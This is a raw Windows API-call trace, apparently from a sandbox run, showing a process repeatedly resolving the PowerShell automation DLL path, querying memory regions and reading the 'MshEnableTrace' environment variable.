	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.467] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0385.472] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.472] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.475] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0385.652] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.653] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.653] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.653] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.654] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.654] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.655] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.655] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.660] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.660] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.660] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0385.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.660] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0385.664] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0385.664] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0385.880] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0386.062] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0386.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.063] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0386.307] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6ffad0
	[0386.308] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6ffbe0
	[0387.132] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0387.807] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0387.810] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0387.810] VirtualQuery (in: lpAddress=0x14a1a0, lpBuffer=0x14b060, dwLength=0x30 | out: lpBuffer=0x14b060*(BaseAddress=0x14a000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.141] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.142] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.143] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.146] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.146] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.150] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.150] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.638] VirtualQuery (in: lpAddress=0x14ba00, lpBuffer=0x14c8c0, dwLength=0x30 | out: lpBuffer=0x14c8c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
